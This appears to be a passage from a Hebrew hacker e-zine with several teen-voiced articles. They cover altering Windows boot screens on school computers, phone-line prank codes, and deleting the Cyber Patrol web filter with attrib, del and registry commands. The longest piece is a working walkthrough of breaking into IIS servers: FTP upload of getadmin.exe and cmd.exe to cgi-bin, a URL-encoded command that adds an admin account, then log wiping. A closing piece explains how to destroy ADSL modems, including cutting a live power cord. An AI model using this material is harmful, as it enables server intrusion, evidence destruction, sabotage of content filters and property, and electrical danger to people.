‫ולחיצו על מקש ה >‪ .<enter‬לא באמת התכוונתי שתקלידו את כל השורה הזאת‪ ,‬סמנו אותה עם‬
‫העכבר ולחיצו‬
‫על ‪ .ctrl + c‬זה ייבצע פעולת העתקה‪ .‬בחלון "הפעלה‪ "...‬לחצו על ‪ .ctrl + v‬זה ייבצע פעולת הדבקה‬
‫וככה תחסכו את כל ההקלדה‪ .‬אז אתם נמצאים בתוך העורך הגרפי שלכם‪ .‬כעת פיתחו את הקובץ‬
‫הבא‪:‬‬
‫‪c:\logo.sys‬‬
‫חשוב שתפתחו אותו בתוך עורך הגרפיקה‪ .‬אם זה לא מצליח לפתוח את הקובץ נסו את‪:‬‬
‫‪c:\ip.sys‬‬
‫כמו שאתם שמים לב יש לפניכם עכשיו את מסך ההפעלה של ווינדוס‪ .‬למה לעזאזל הוא בקובץ‬
‫מערכת???‬
‫(‪).sys‬‬
‫כי מיקרוסופט מצד אחד היו צריכים להחביא את הקובץ‪ ,‬מצד שני היו צריכים שיהיה באפשרותם‬
‫לגרום לו‬
‫שינויים גם אחרי שמערכת ההפעלה כבר הותקנה במחשב‪ ,‬בלי להתקין מחדש מדיסק אחר שבו‬
‫השינויים נעשו‬
‫בתיכנות עצמו‪ .‬אז הם שמרו את מסכי ההעפלה‪/‬כיבוי בתוך קובץ מערכת‪ ,‬דבר חכם כי למה לעזאזל‬
‫שמישהו‬
‫יישחק עם קובץ מערכת? זה בד"כ יהרוס את המחשב‪ ...‬מי בעולם ישחק עם קבצים כאלה?????‬
‫אנחנו‪ .‬טוב‪ ,‬אז תשתמשו בכלים שבתוכנת הגרפיקה שלכם כדי לשנות את מסך ההפעלה לאיך שאתם‬
‫רוצים שייראה‪.‬‬

‫אם אתם רוצים אתם גם יכולים לקחת תמונה אחרת (של מרילין מנסון לדוגמא‪ ,‬או אפילו של‬
‫עצמיכם)‪ ,‬ולשמור‬
‫אותה על שם הקובץ ‪c:\logo.sys‬‬
‫ואז בכל פעם שתפעילו את המחשב זה יופיע!!!‬
‫רק דבר אחד קטן‪ ,‬חשוב מאוד שהתמונה תהיה בגודל רוחב ‪ 320‬וגובה ‪ 400‬בפיקסלים‪ .‬גודל הקובץ‬
‫לא חשוב‬
‫אז גם אם זאת תמונה של מאה מגהבייט זה בסדר‪( .‬טוב אולי הגזמתי‪ ,‬אבל גודל הקובץ פה לא‬
‫עקרוני)‪.‬‬
‫אז אם התמונה שלכם לא בגודל המתאים פיתחו אותה עם העורך הגרפי ושנו את גודל התמונה ל ‪320‬‬
‫על ‪.400‬‬
‫מה עוד נשאר לנו? מסכי הכיבוי‪ .‬בתוך העורך הגרפי פיתחו את הקובץ‪:‬‬
‫‪c:\windows\logow.sys‬‬
‫כעת פיתחו את‪:‬‬
‫‪c:\windows\logos.sys‬‬
‫כל מה שהסברתי על הקובץ ‪ c:\logo.sys‬נכון גם לגבי הקבצים האלה‪ .‬זה אולי לא נראה לכם דבר‬
‫כזה‬
‫מגניב‪ ,‬אבל פעם הבאה שתגיעו לבית ספר‪ ,‬אם יש לכם שם מחשבים‪ ,‬אני חושב שתסכימו איתי שיהיה‬
‫די כייף‬
‫ומצחיק אם תחליפו את מסכי ההפעלה‪/‬כיבוי בתמונת פורנו או ‪!!!!school sucks‬‬
‫שלכם‪ ,‬גיהנום‬

‫מספרים שימושים‬
‫שלום לכולם!‬
‫הרבה זמן לא הייתה כתבה טובה על טלפוניה‪.‬‬
‫גם הכתבה הזאת עדיין לא משהו‪.‬‬
‫אבל לפחות זה משהו‪.‬‬
‫היום נלמד כמה "מספרים סודיים" לטלפון רגיל של בזק‪.‬‬
‫כמעט כולם מכירים את הקודים לפלאפונים של סלקום ‪ /‬אורנג'‪ /‬פלאפון‪,‬‬
‫אבל את הקודים לבזק כמעט אף אחד לא מכיר‪.‬‬
‫קוד ראשון‪.110 :‬‬
‫פשוט הרימו את הטלפון‪ ,‬וחייגו ‪ .110‬תענה לכם הקלטה שתקריא לכם את‪...‬‬
‫מספר הטלפון שלכם! למה זה שימושי לעזאזל‪ ,‬שאלתם? אז הנה‪:‬‬
‫ אם יש לכם כמה קווים בבית‪ ,‬ואתם רוצים לבדוק אם שקע מסוים שייך למספר‬‫אחד או לשני‪.‬‬
‫ אם אתם אצל מישהו בבית‪ ,‬שמסרב לתת לכם את מספר הטלפון שלו‪.‬‬‫ אם אתם בטלפון ציבורי‪ ,‬ואתם רוצים לדעת מה המספר שלו כדי שיתקשרו‬‫אליכם חזרה‪.‬‬
‫ כל דבר אחר שעולה לכם בראש‪.‬‬‫קוד נוסף‪.113 :‬‬
‫פשוט הרימו את הטלפון‪ ,‬וחייגו ‪ .113‬תשמעו כמה צפצופים‪ ,‬מהירים יותר‬
‫מצליל שיש אחרי שמחייגים ועד שעונים לכם‪ ,‬אבל איטי יותר מצליל תפוס‪.‬‬
‫אחרי כמה צפצופים כאלה‪ ,‬קו הטלפון שלכם פשוט ימות! טלפונים שלא מחוברים‬
‫לחשמל‪ ,‬יעני טלפונים פשוטים לא אלחוטיים ובלי מזכירה‪ ,‬יפסיקו בכלל לפעול‬
‫כאילו הוצאתם אותם מהשקע‪.‬‬
‫ועוד דבר‪ :‬זה זמני‪ ,‬רק בערך ‪ 2‬דקות‪ .‬אחרי ‪ 2‬דקות הקו יחזור‪ .‬אחרי שהוא‬
‫חוזר‪ ,‬בהתחלה הוא יעשה צפצופים כמו קודם‪ ,‬אבל אז תניחו את השפורפרת במקום‬
‫ותוך עוד איזה דקה זה יסתדר‪.‬‬
‫למה זה שימושי לעזאזל‪ ,‬שאלתם? אז הנה‪( :‬יש לי דז'ה וו עכשיו)‬
‫ לעבוד על מישהו שאתם אצלו ‪ -‬לבקש ממנו לעשות שיחה‪ ,‬להרוג לו את הקו‪,‬‬‫ואז להגיד לו שהקו לא עובד‪ ,‬מראים לו‪ ,‬והוא נכנס לפניקה!‬
‫עוד קוד‪.114 :‬‬
‫פשוט חייגו אותו‪ ,‬יהיה צליל המתנה של אחרי חיוג‪ ,‬ואז הוא פשוט יתחיל‬
‫לצפצף כמו משוגע‪ .‬למה זה טוב? זה לא‪.‬‬
‫הקוד הבא‪.112 :‬‬
‫אתם בטח יודעים‪ ,‬שמי שלא בחר מפעיל בין לאומי ‪ -‬החיוג באמצעות ‪ 00‬או ‪188‬‬
‫נחסם בשבילו‪ ,‬וכשהוא מנסה לחייג עם ‪ 00‬או ‪ 188‬אז הוא מקבל הודעה שהוא לא‬
‫יכול‪ .‬בעצם‪ ,‬הוא מופנה עם "עקוב אחרי" אל המספר ‪ ,112‬שם נמצאת ההודעה‪.‬‬
‫אז אם תחייגו ‪ 112‬תשמעו את ההודעה‪.‬‬
‫למה זה טוב לעזאזל? אפשר ללמוד להגיד "שירות החיוג באמצעות ‪ 00‬ו‪ 188-‬חסום"‬
‫באנגלית‪ ,‬ערבית‪ ,‬ורוסית‪.‬‬
‫טיפ קטן‪ :‬אם יש לכם טלפון ישן‪ ,‬שמחייג ב"מתקפים" (שלוחצים על ‪ ,5‬שומעים ‪5‬‬
‫תקתוקים) אז אתם לא יכולים להשתמש בכל מיני "שרותי טלפון" שמבקשים ממכם ללחוץ‬
‫על מספרים‪ ,‬כמו למשל טלמסרים למיניהם‪ .‬אז בחלק מהטלפונים האלה‪ ,‬אם תחייגו * לפני‬
‫המספר‪ ,‬הטלפון יחייג בחיוג צלילים ‪ -‬השיטה הנורמלית‪ ,‬שלכל מקש יש צליל‪.‬‬
‫אם יש לכם פלאפון‪ ,‬כנסו לספר טלפונים שלו והוסיפו שם חדש שקוראים לו‪:‬‬

‫‪umop apis dn‬‬
‫מה כתוב כאן? הפכו את הטלפון וגלו!‬
‫מנגינות בטלפון!‬
‫‪------------------‬‬‫‪3212333-222-333-3212333-22321-1‬‬
‫(איפה שיש "‪ "-‬לוחצים יותר זמן על המקש)‬
‫חייגו את המספר הזה ‪ -‬ותקשיבו בזמן שאתם מחייגים ‪ -‬ותשמעו את השיר "למרים טלה קטן"‪.‬‬
‫מי שלמד אי פעם נגינה‪ ,‬מכיר את השיר הזה כי זה השיר הראשון שלומדים כשלומדים נגינה‪.‬‬
‫‪ - 7486168‬חייגו את המספר הזה ותשמעו את ההתחלה של "ברני"! כדאי לחייג * או משהו כזה‬
‫קודם‪ ,‬כי מספר כזה באמת קיים ומישהו עשוי לענות לכם‪.‬‬
‫‪ - 1131222‬זה עולם קטן מאוד‪.‬‬
‫אז זהו בינתיים‬
‫ביי‪,‬‬
‫בנץ‪.‬‬

‫נטרול תוכנת סייבר‪-‬פורטל‬
‫היי!‬
‫כולם כאן בטח מכירים את התוכנה סייבר‪-‬פטרול‪ .‬זאת תוכנת פילטר לאתרי אינטרנט‪,‬‬
‫שהרבה בתי ספר משתמשים בה כדי שהתלמידים לא יגלשו לאתרי סקס וכו'‪.‬‬
‫הבעיה עם התוכנה הזאת‪ ,‬שאם מנסים למחוק אותה ידנית‪ ,‬היא חוסמת לחלוטין את המחשב‬
‫ולא נותנת לכם להפעיל אפילו את ווינדוס‪.‬‬
‫אז אם בבית ספר שלכם יש את סייבר‪-‬פטרול וחשקה נפשכם בכמה "אתרים אסורים"‪,‬‬
‫זו ממש לא בעיה לעקוף את סייבר‪-‬פטרול גם בלי הסיסמה‪.‬‬
‫אני יוצא מנקודת הנחה שאתם מכירים "קצת" את דוס‪ ,‬ואם לא‪ ,‬תפנו לגיליון מס' ‪ 2‬של‬
‫גיהינום‪,‬‬
‫הוא מסביר שם קצת על דוס‪.‬‬
‫‪---------------------------------------------------------------------------------‬‬‫הערה חשובה‪ :‬תעשו את זה רק במחשבים של בית ספר או מחשב אחר שיש בו סייבר פטרול‬
‫ושממש‬
‫לא אכפת לכם מהמחשב‪ .‬למה? בגלל שיכול להיות שאם תטעו באות אחת תמחקו קובץ לא‬
‫נכון‬
‫ותהרסו את המחשב‪ .‬אבל הכל תעשו בשביל סקס‪ ,‬לא?‬
‫‪---------------------------------------------------------------------------------‬‬‫כל מה שצריך לעשות זה‪:‬‬
‫‪ .1‬להפעיל את המחשב במצב דוס אמיתי (לא דוס מתוך ווינדוס)‪ ,‬כלומר להפעיל את‬
‫המחשב‬
‫מחדש‪ ,‬וללחוץ על אף‪ 8-‬עד שמופיע התפריט איתחול‪ .‬בוחרים שם את האפשרות‬
‫‪command prompt only‬‬
‫ואז מגיעים למצב דוס‪.‬‬
‫‪ .2‬נכנסים לספריה של ווינדוס‪ ,‬ומוחקים את הקובץ ‪ - atm.sys‬זהו הקובץ הסודי‬
‫שעושה‬
‫שאם תמחקו את התוכנה ווינדוס לא יעלה‪ .‬הקובץ אמור להיות מוגן ‪ -‬אבל את זה‬
‫עוקפים ככה‪:‬‬
‫‪attrib -r -s -h atm.sys‬‬
‫כמובן שאת זה עושים רק אחרי שנכנסתם לספריה של ווינדוס‪ .‬אחרי שהסרתם את‬
‫ההגנה‪ ,‬מחקו את‬
‫הקובץ ככה‪:‬‬
‫‪del atm.sys‬‬
‫‪ .3‬כותבים את זה שאתם עדיין בספריה של ווינדוס (תעשו יישור לשמאל)‪:‬‬
‫‪attrib -r -s -h system.386‬‬
‫‪attrib -r -s -h system\system.drv‬‬
‫‪copy system.386 system\system.drv‬‬
‫אם הוא שואל‪ ,‬תלחצו על כן‪.‬‬
‫‪del system.386‬‬
‫הסבר למה שעשינו פה‪ ,‬למי שרוצה לדעת‪ :‬הסרנו את הגנת המחיקה לשני קבצים‪.‬‬
‫את הקובץ סיסטם‪ 386.‬מהספריה של ווינדוס העתקנו "על" הקובץ סיסטם‪.‬דרב ואז‬
‫ומחקנו את הקובץ סיסטם‪.386.‬‬
‫‪ .4‬מוחקים לחלוטין את הספריה ‪c:\patrol‬‬
‫‪ .5‬מוחקים את הקבצים הבאים‪ ,‬בספריה של ווינדוס‪ .‬אם הם לא קיימים‪ ,‬זה בסדר‪.‬‬

‫פשוט זה תלוי איזה גרסה של סייברפטרול יש לכם‪.‬‬
‫‪ilc.exe‬‬
‫‪iic.exe‬‬
‫‪lic.exe‬‬
‫‪llc.exe‬‬
‫‪ic.exe‬‬
‫‪lc.exe‬‬
‫‪icfire.exe‬‬
‫‪lcfire.exe‬‬
‫‪icp.log‬‬
‫‪lcp.log‬‬
‫‪nt16.dll‬‬
‫‪ts.dll‬‬
‫‪ts16.dll‬‬
‫‪ts32.dll‬‬
‫‪tsnt.dll‬‬
‫‪tsntx.exe‬‬
‫‪usage.log‬‬
‫‪usage5.log‬‬
‫‪llc.exe‬‬
‫‪ .6‬מהספרייה סיסטם או סיסטם‪ 32‬שבתוך הספריה של ווינדוס תמחקו את הקובץ‬
‫‪ isystem.drv‬ו ‪lsystem.drv‬‬
‫עכשיו תעשו ריסט ותפעילו את ווינדוס כרגיל‪ .‬זהו! אין סייבר פטרול!‬
‫אם אתם רוצים לנקות ממש ממש‪ ,‬תמחקו מהרג'יסטרי את מה שמפעיל את סייבר פטרול‬
‫ככה‪:‬‬
‫ תפעילו את הקובץ ‪regedit.exe‬‬‫ תמחקו את ה‪ registry keys-‬האלו‪:‬‬‫‪hkey_local_machine\software\cyber patrol‬‬
‫‪hkey_local_machine\software\microsoft\windows\currentversion\run\cyber‬‬
‫‪patrol‬‬
‫‪hkey_local_machine\software\microsoft\windows\currentversion\uninstall\cyber‬‬
‫‪patrol‬‬
‫זהו! גמרנו! סייבר פטרול הלך ולא יחזור! לפחות עד שבית הספר יעלה על זה ויתקינו‬
‫אותו‬
‫עוד פעם‪ .‬ואתם תמחקו אותו עוד פעם‪ .‬והם יעלו על זה ויתקינו אותו עוד פעם‪ .‬ואתם‬
‫תמחקו‪.‬‬
‫וככה עד שתסיימו את בית ספר‪ .‬או שלא‪.‬‬
‫טוב אז ביי עד לפעם האחרונה‪,‬‬
‫בנץ‪.‬‬

‫פריצה לאתרים ‪ -‬דוגמאות לאקספלויטים‬
‫‪hello motherfucker‬‬
‫מה שלומכם? ‪9:‬‬
‫בטח ראיתם שכבר הרבההההה זמן לא היו כתבות ממני וזה מכמה סיבות‪:‬‬
‫א‪ .‬סייממממתתתתייייי בבבבייייתתתתת ספפפפפררררררררר!!!!!‬
‫אז הייתי עסוקה בלחגוג‪( .‬הקפצנו קולה ודרסנו זקנות)‬
‫ב‪ .‬אני עסוקה בלהביא לכם אותה ב ה‪-‬כתבה ה‪-‬פ‪33‬ה אבל אני עוד תקועה שם (גיהנום האני‪ ,‬אל‬
‫תחכה‪ ,‬אני אצטרך ללמוד ספר שלם על ‪ asp‬בשביל זה‪)..‬‬
‫ג‪ .‬כתבתי שירים כל היום (סתם‪ ,‬כולה ‪ <- )2‬שייקספיר ממכר‪.‬‬
‫ד‪ .‬לא בא לי עליכם‪.‬‬
‫שיא עולמי‪ :‬תגידו קרה פעם שמישהו התקשר אליכם ולא עניתם ואחרי פחות מחצי שעה ראיתם ‪39‬‬
‫שיחות שלא נענו? (זיפ בטח מחייך עכשיו)‪.‬‬
‫ועכשיו קצת חדשות‪ :‬זוכרים שאמרתי לכם לפני שנים על כנס ההאקרים השנה? אז זהווו שיש פגישת‬
‫מארגנים בשבוע הבא (תאכלו את הלב יהיה לי חולצה של מארגן) אז מאוד בקרוב אני אהיה חכמה‬
‫יותר להגיד לכם מה חדש‪ .‬בטח עד שהכתבה הזאת תתפרסם כבר אני אדע מה קורה‪.‬‬
‫והיום ילדים‪ ,‬נלמד שיטה לפריצת אתרים! ממש ככה‪ .‬אתם תלמדו היום איך לפרוץ מערכות פגיעות‬
‫עם מנהלים טפשים ששכחו לחסום גישה לתיקייה בשם ‪!!cgi-bin‬‬
‫זוהי הכתבה הראשונה בסדרת כתבות על ‪:iis‬‬
‫(ייתכן שיקח לי עוד זמן לפרסם את השאר‪ ,‬אז אנא האזרו בשבלולנות)‬
‫בכתבות הבאות בנושא אני אסביר יותר לעומק מה זה ‪ iis‬ואיך היא עובדת‪ ,‬ולכן לצורך העניין‬
‫הסברתי כאן ממש בכלליות‪ .‬אז אני גאה להציג את‪...‬‬
‫========================================================‬
‫‪iis hacking no.1 : how to hack through the cgi-bin‬‬
‫========================================================‬
‫כן כן‪ ,‬ממש להשיג ‪...admin rights‬‬
‫אז מה זה שרת המריץ ‪?iis‬‬
‫זוהי מערכת המשתמשת ב ‪ )iis )internet infrmation server‬שזה שרת אינטרנט ותוכנות לניהול‬
‫האינטרנט‪ .‬של מייקרוסופט‪ .‬אוווו‪ ...‬ואתם יודעים מה זה אומר‪...‬‬
‫לדוגמה אתם חוקרים אתר של חברה מסויימת‪ .‬איך תדעו אם הוא משתמש ב ‪ ?iis‬לרוב ניתן להשיג‬
‫את זה דרך פורט ‪ .80‬התבוננו בהודעת השגיאה שתקבלו אם תקישו ‪ get http‬או סתם שטויות‪:‬‬
‫‪http/1.1 400 bad request‬‬
‫‪server: microsoft-iis/4.0‬‬
‫‪date: wed, 30 may 2001 20:47:31 gmt‬‬
‫‪content-length: 407‬‬
‫‪content-type: text/html‬‬
‫השרת מודיע לנו שהוא מריץ ‪.iis‬‬
‫הפריצה‪:‬‬
‫טוב‪ ...‬נסו את ה‪ .ftp‬פורט ‪ .21‬אם אין לכם חשבון על אותו שרת‪ ,‬נסו להכנס בשם‬
‫‪anonymous‬‬
‫(בחלון דוס‪ ,‬הקלידו‪:‬‬
‫‪ftp www.victim.com‬‬
‫המחשב יגיב‪:‬‬
‫‪.connected to www.company.com‬‬
‫‪.)victim microsoft ftp service )version 3.0 220‬‬
‫((‪user : )www.comapny.com:)none‬‬
‫הקלידו‪:‬‬

‫‪anonymous‬‬
‫השרת יבקש כתובת אימייל בתור סיסמה‪ .‬המציאו משהו‪.‬‬
‫‪) password gehenom@underground.com‬‬
‫כעת‪ ,‬שימו לב שהשרת אמר את השם שלו‪ .)victim microsoft ftp service )version 3.0 :‬שם השרת‬
‫הוא ‪ .victim‬זה אומר‪ ,‬שבמערכת ה ‪ iis‬חשבון ה ‪ anonymous‬יקרא ‪ .iusr_victim‬נזכור זאת לשימוש‬
‫מאוחר יותר‪.‬‬
‫השיטה הזאת תעבוד אך ורק אם יש לכם הרשאה להעלות קבצים לספריה ‪ .cgi-bin‬נסו להכנס‬
‫לספריה זו באמצעות‬
‫‪( cd‬לחצו על אנטר)‬
‫‪. cgi-bin‬‬
‫(כדי לבדוק באיזה ספריה אתם‪ ,‬הפקודה‪.)pwd :‬‬
‫נניח שהצלחתם להכנס לתיקיה בלי ‪ ,access denied‬נסו להעלות קובץ לשרת‪ .‬צרו קובץ טקסט ריק‬
‫לדוגמה ונסו להעלות אותו באמצעות הפקודה‪:‬‬
‫‪put c:\mytext.txt‬‬
‫אם הפקודה תתבצע כראוי תראו שהשרת מקבל את הקובץ ומאשר את הקבלה‪port command 200 :‬‬
‫‪.successful‬‬
‫הקלידו‬
‫‪dir‬‬
‫כדי לראות את רשימת הקבצים‪.‬‬
‫הצלחתם להעלות קובץ ל ‪ ?cgi-bin‬אתם מסודרים‪.‬‬
‫כעת‪ ,‬לאלה מכם שמשתמשים ב ‪ ,nt‬בדקו אם יש לכם את הקבצים ‪ cmd.exe, gasys.dll‬ו‬
‫‪getadmin.exe‬‬
‫לאלה מכם שלא על ‪ nt‬או לאלה מכם שכן אבל אין להם את הקבצים הנ"ל‪ ,‬לכו למנוע החיפוש החביב‬
‫עליכם והשיגו את הקבצים‪( .‬או בקשו ממשתמשי ‪ nt‬את ‪ .)cmd.exe, gasys.dll‬בכל מקרה‪ ,‬את‬
‫‪ getadmin.exe‬לא קשה להשיג‪.‬‬
‫ועכשיווו‪ ...‬פתחו את ה ‪ ftp‬שוב‪ ,‬והקלידו‬
‫‪( binary‬פתיחת התקשרות לקבלת קובץ בינארי)‬
‫ואז‬
‫‪put cmd.exe‬‬
‫‪put gasys.dll‬‬
‫‪put getadmin.exe‬‬
‫סגרו את ה ‪.ftp‬‬
‫כעת‪ ,‬פתחו את הדפדפן שלכם והקלידו‪:‬‬
‫‪http://www.company.com/cgi-bin/getadmin.exe?iusr_victim‬‬
‫הדפדפן יענה‪:‬‬
‫‪cgi error‬‬
‫‪.the specified cgi application misbehaved by not returning a complete set of http headers‬‬
‫אתם יודעים מה זה אומר? שכעת למשתמש ‪ iusr_victim‬יש הרשאות של משתמש על! (אדמין)‪ .‬בואו‬
‫ניצור חשבון חדש בשם ‪ gehenom‬שסיסמתו תהיה‪ .underground :‬שוב בחלון הדפדפן הקלידו‬
‫‪http://www.company.com/cgi‬‬‫‪bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20gehenom%20underground%20/‬‬
‫‪add‬‬
‫וכדי לתת גם לחשבון הזה זכויות של משתמש על‪,‬‬
‫‪http://www.company.com/cgi-bin/getadmin.exe?gehenom‬‬
‫כעת התחברו שוב ל ‪ ,ftp‬אבל הפעם בתור המשתמש ‪ gehenom‬והסיסמה ‪.password‬‬
‫זהו! עכשיו אתם שולטים במערכת! אם אתם משתמשים ב ‪ nt‬אתם יכולים להעזר ב ‪user manager‬‬
‫וב ‪ server manager‬כדי לשלוט על המערכת‪.‬‬
‫קחו כוס קולה‪ ,‬תחגגו את הרגע‪ ,‬ואז תעשו מה שתמיד חלמתם לעשות על אותה מערכת (אני לא‬
‫ממליצה למחוק קבצים‪ ,‬זה סתם מנייאקי)‬
‫ניקיון‪:‬‬
‫אל תשכחו להכנס לכונן ‪( c$‬מוסתר) לספריה ‪ winnt\system32\logfiles‬ולעדכן את הלוג של אותו‬

‫יום‪ ,‬זאת אומרת למחוק כל זכר לכך שהייתם שם‪ .‬שמרו את הלוג החדש‪ .‬אם זה עושה לכם בעיות‪,‬‬
‫לפחות שנו את התאריך של הלוג כדי לא להחשיד‪:‬‬
‫‪http://www.company.com/cgi-bin/cmd.exe?/c%20date%2002/02/98‬‬
‫אל תשכחו להוריד מהאנונימוס את הרשאות משתמש העל‪ ,‬ולמחוק את החשבון שיצרתם (‬
‫‪ )gehenom‬ואת הקבצים שהעלתם לשרת‬
‫(‪dele cmd.exe‬‬
‫‪dele gasys.dll‬‬
‫‪)dele getadmin.exe‬‬
‫בדקו אם אין עוד לוגים ששכחתם לעדכן‪ ,‬ועזבו את השרת‪.‬‬
‫יש לציין כי השיטה עובדת *רק* במקרה שיש גישה ל ‪ cgi-bin‬ורשות להעלות קבצים‪ ,‬וזה מאוד‬
‫מאוד נדיר למצוא שרת כ"כ פגיע‪.‬‬
‫למה זה עובד?‬
‫כי ב ‪ iis‬ספריית ה ‪ cgi-bin‬משמשת לאחסון סקריפטים שהמשתמש יכול להריץ‪ .‬אם העליתם לשם‬
‫אקספלוייט (במקרה שלנו ‪ )getadmin.exe‬השרת יכול להריץ אותו דרך שורת הכתובת (ז"א דרך‬
‫הדפדפן)‪ .‬בניגוד לספריות אחרות על השרת‪ ,‬קובץ המועלה ל ‪ cgi-bin‬רץ על השרת *עצמו* ולא על‬
‫המחשב שלכם! לכן כאשר מעלים לשם אקספלוייט הוא ירוץ על המערכת עצמה ויפרוץ אותה‪.‬‬
‫קרדיטים‪:‬‬
‫את השיטה הזאת למדתי מקובץ בשם ‪ hacking-nt‬שמאוד קל למצוא על האינטרנט‬
‫למעוניינים חפשו ‪ ,hacking-nt‬זהו הקובץ שמתחיל במילים‪:‬‬
‫‪.johnny hacker has a windows nt server at home‬‬
‫חכו לעוד כתבות בעניין‪ ,‬אבל תסלחו לי אם זה יקח קצת זמן‬
‫‪drink disgusting cherry cokes‬‬
‫‪and happy hacking‬‬
‫שלכם‪,‬‬
‫בלאדי‪.‬‬

‫איך לשפר ביצועים ועד איך לחבל במודמים‬
‫שירות וואו של בזק מסופק ב ‪ 80‬אחוז מהערים בארץ ישראל‪.‬‬
‫כאשר אתם מזמינים את השירות אתה נתקעים בשבועיים בממוצע המתנה להתקנה ואז מתבאסים‬
‫(לא בכל המקרים‪).‬‬
‫שירות וואו של בזק הוא עובד דרך ‪.adsl‬‬
‫‪ adsl‬הוא חיבור לאינטרנט במהירות יותר גבוהה ממה שהייתם רגילים לו‪.‬‬
‫אם מישהו אמר לכם שזה לא שווה את הכסף שזה עולה (וזה די יקר) הוא משקר אבל כמו כן‪,‬‬
‫מי שאמר לכם שזה שווה הוא כמו כן שקרן‪.‬‬
‫בזק מחלקת את הארץ לשני חלקים‪ ,‬חלק אשר מקבל את מודם האלקטל וחלק את מודם האורכית‪.‬‬
‫קצת על כל מודם וביצועיו ואיך להרוס אותו טוטאלית‪:‬‬
‫מודם אלקטל של בזק ‪:‬‬
‫‪------------------------------------------------------------------------------------‬‬‫מודם מכוער וארוך בצבע שחור‪.‬‬
‫בזק אומרת שכל המודמים מוגבלים בקיבולת שלהם אבל מודם אלטקל מוכיח את טענתם‪.‬‬
‫כל מי שאני מכיר שיש לו אלקטל מתבאס מת ואפילו מתנתק מהשירות‪.‬‬
‫בממוצע מודם אלקטל יביא לכם את הביצועים הבאים‪:‬‬
‫‪: test‬‬
‫*‪)246kb/s )down‬‬
‫*‪)11kb/s )up‬‬
‫אבל כמובן יש דרכים לשפר את הביצועים‪.‬‬
‫‪ .1‬לעבור עיר ואז לקבל מודם אחר‪.‬‬
‫‪ .2‬לקנות ממישהו מודם אורכית ולעשות את ההתקנה ולהיזהר שבזק לא יגלו‪.‬‬
‫‪ .3‬להכין קובץ ‪ reg‬חדש ולכתוב בפנים ‪:‬‬
‫‪-----------------------------------------------------------------------------------‬‬‫‪regedit4‬‬
‫]‪[hkey_local_machine\system\currentcontrolset\services\vxd\mstcp‬‬
‫"‪"defaultrcvwindow"="64245‬‬
‫‪-----------------------------------------------------------------------------------‬‬‫הקובץ הזה בעצם משנה כמה דברים ברג'יסטי אבל אני לא אפרט כי זה לא נחוץ לנו‪.‬‬
‫אתם יכולים לשחק עם הטווח אבל תיזהרו לא לקפוץ למרחקים שלא תחזרו מהם‪.‬‬
‫תלכו מקסימום ‪ 12‬מספרים קדימה או אחורה‪.‬‬
‫‪.64257 <- 64245 -> 64233‬‬
‫אנרכיה ‪ -‬אם ברצונכם להרוס את המודם טוטאלית אבל בדרך מקורית‪...‬‬
‫מאחורי המודם יש שם כפתור אשר מאפס את המודם (‪ )restart‬אשר עליו תלחצו עם מוט‪ ,‬קיסם וכו'‪.‬‬
‫שימו שם את הפריט שאיתו אתם לוחצים והדביקו אם צלוטייפ (או כל חומר דביק אחר)‪.‬‬
‫מה קורה עכשיו ‪ :‬האיפוס ימשיך הרבה זמן והמודם יתחיל להתחרפן‪,‬‬
‫תהיה הפסקת חשמל קטנה אבל אתם כולה מחזירים את הפלאג בארון החשמל למקום‪.‬‬
‫אל תשכחו לוודאות שבזמן שאתם עושים את הנ"ל המודם מחובר לחשמל !!!!!!‬
‫(אבל שלא יהיה מחובר למחשב‪ ,‬מומלץ‪ ,‬כי זה יכול גם אתם יודעים‪ ,‬לשרוף משהו בבלוק)‪.‬‬
‫‪------------------------------------------------------------------------------------‬‬‫מודם אורכית של בזק‪:‬‬
‫‪------------------‬‬‫מודם קטן ויפיפיה אשר לא מוגבל‪.‬‬
‫אנשים עם מודם כזה לא יורדים מהמאה חמישים קיי בהורדה ומעלים מהירות נורמלית‪.‬‬
‫ממוצע של מודם אורכית ‪:‬‬
‫‪: test‬‬
‫*‪)341kb/s )down‬‬
‫*‪)102kb/s )up‬‬
‫אבל גם את זה אפשר לשפר‪.‬‬
‫מה עושים ‪ :‬יש שני שיטות שאני מכיר והם הכי טובות‪:‬‬

‫‪.1‬‬
‫‪.go to network , press on proporties‬‬
‫‪.choose dial-up adapter, press on proporties‬‬
‫‪.go to advanced, go to ip packte size‬‬
‫‪.change the value from automatic to ------ >> medium‬‬
‫‪ .2‬פתחו קובץ ‪ reg‬חדש וכתוב שם‪:‬‬
‫‪-----------------------------------------------------------------------------------‬‬‫‪regedit4‬‬
‫]‪[hkey_local_machine\system\currentcontrolset\services\vxd\mstcp‬‬
‫"‪"defaultrcvwindow"="64249‬‬
‫‪-----------------------------------------------------------------------------------‬‬‫אנרכיה ‪:‬‬
‫דרכים להרוס מודם אורכית‪:‬‬
‫על מודם האורכית הנחמד שלנו אין כפתורים לאיפוס ובלה בלה‪.‬‬
‫אז פשוט קחו את החוט אשר יוצא מהמודם לחשמל‪ ,‬פתחו אותו אם סכין‪ ,‬חשפו את החוטים בפנים‪,‬‬
‫תחכתכו אחד מהחוטים אשר תמצאו בפנים וחברו שוב לחשמל‪ ,‬אני לא מספר מה קורה‪ ,‬אם אתם‬
‫רוצים לדעת ‪,‬‬
‫תנסו‪ ,‬למרות שאני לא ממליץ בחום !!!‬
‫‪-----------------------------------------------------------------------------------‬‬‫הסברים אחרונים למאותגרים שלא הבינו מה עושים‪.‬‬
‫* לאחר שכותבים קובץ ‪ ,reg‬שומרים אותו ‪ ,‬אז מפעילים אותו ‪ ,‬הוא ישאל אתכם בלה בלה ואז‬
‫אומרים "כן"‪.‬‬
‫** מודם אלקטל לא תמיד יהיה מסריח וגם אורכית לא תמיד יהיה טוב ‪ ,‬יש עוד פרמטרים אשר‬
‫קובעים מהירות‪:‬‬
‫‪ .1‬המרחק מהמרכזיה לבית שלכם‪.‬‬
‫‪ .2‬החוטים של הטלפון‪ ,‬חדשים ישנים סדוקים גמורים או מה‪ ...‬ככל שיותר חדשים יותר טוב‪.‬‬
‫*** עכשיו שימו לב השיטות של שיפור הביצועים היא לא תמיד תעבוד‪ ,‬זה תלוי במרכזיה אשר בעיר‬
‫שלכם‬
‫אם היא ישנה יחסית לשירות אז זה יעבוד אבל אם היא חדשה אז תשכחו מזה !!!!‬
‫זהו ‪ ,‬רק שתדעו בזק הם בני זונות אשר גונבים כספים ואני ממליץ‪:‬‬
‫"רק למי שיש כסף בצד שיתחבר‪ ,‬כי לאנשים יותר פשוטים עדיך להוציא את הכסף על דברים אחרים‪,‬‬
‫כמוני ‪.))))))))))):‬‬
